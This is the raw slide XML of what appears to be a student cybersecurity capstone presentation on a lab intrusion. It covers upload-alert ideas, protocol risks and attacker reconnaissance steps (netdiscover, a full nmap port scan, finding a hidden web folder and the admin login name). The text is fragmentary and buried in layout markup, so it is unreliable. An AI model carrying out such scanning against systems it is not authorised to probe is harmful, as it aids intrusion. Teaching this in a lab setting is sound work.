              <a:t>ind of alarm that can be set to detect future file uploads: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>lerts for http.request.method PUT and POST go from any external or non-whitelisted IPs.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POST alert should be specific for non-permitted formats php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>.such as php.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Proposed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> threshold would you set to activate this alarm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>1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75" name="Google Shape;1275;p2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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>onfigurations that can be set on the host to block file uploads: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Filebeat can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>configured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>files and http request methods.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Specify remote IP addresses and ports for file upload. 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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364273" y="907401"/>
            <a:ext cx="6322902" cy="37848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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6896697" y="907401"/>
            <a:ext cx="2125806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192.168.1.0/16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Hostname: ML-RefVM-684427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OS: Linux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IPv4:192.1.100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Server1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descr="Diagram, timeline&#10;&#10;Description automatically generated" id="1061" name="Google Shape;10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371" y="1100201"/>
            <a:ext cx="4564566" cy="352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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12300" y="7902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69806" y="14872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{997C1110-5C07-4AEE-97EE-63EA7502C6FF}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41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VM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2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Attacker’s machine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 for Incident Analysis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Server1 (Capstone)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Victim’s machine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3" name="Google Shape;1083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4" name="Google Shape;1084;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="13018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{997C1110-5C07-4AEE-97EE-63EA7502C6FF}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1783125"/>
                <a:gridCol w="3791875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ssh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protocol that gives users, particularly system administrators, a secure way to access a computer over an unsecured network.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allows attackers to remotely gain privilege access to network.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http is an unsecure protocol that handles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communications between web servers and browsers. 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allows attacker to performer attacks such as SQL injection, XSS, session hijacking, etc. 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Extension to the HTTP specification that adds a capability to remotely add and manage the content of a web server.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allows attackers to gain access to web servers.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http</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="358950" y="1444386"/>
            <a:ext cx="3848718" cy="2923204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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323231" y="1440978"/>
            <a:ext cx="3920155" cy="2814619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netdiscover to find the IP of the victim's machine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0" i="0" lang="en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netdiscover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0" i="0" lang="en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192.168.1.105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nmap to find which ports were opened  on victim’s machine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0" i="0" lang="en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nmap –p- 192.168.1.105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0" i="0" lang="en" sz="12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port 22 (ssh) and port 80 (http) are open.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Firefox browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-1016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016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2" name="Google Shape;1092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3" name="Google Shape;109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4" name="Google Shape;109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5" name="Google Shape;1095;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4422412" y="851714"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1096" name="Google Shape;1096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8" name="Google Shape;1098;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4689505" y="1444386"/>
            <a:ext cx="4147313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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689505" y="1444386"/>
            <a:ext cx="4147313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/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open port 80 allowed the attacker to use the web browser to access different folders of the company and found out about a secret folder located in the company folder directory.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secret folder login window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indicated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that Ashton was the admin login name.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http cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105" name="Google Shape;1105;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="394668" y="1506931"/>
            <a:ext cx="8513587" cy="312600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6" name="Google Shape;1106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07" name="Google Shape;1107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8" name="Google Shape;1108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9" name="Google Shape;1109;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="29875" l="0" r="10813" t="21508"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="501597" y="1810169"/>
            <a:ext cx="4104042" cy="89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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25917" l="0" r="0" t="1513"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4769129" y="1833328"/>
            <a:ext cx="3754200" cy="202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232" y="3143250"/>
            <a:ext cx="4118235" cy="1185033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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457181" y="1514423"/>
            <a:ext cx="10999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netdiscover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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501597" y="2807122"/>
            <a:ext cx="6319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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4671467" y="1525551"/>
            <a:ext cx="17748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http://192.168.105.1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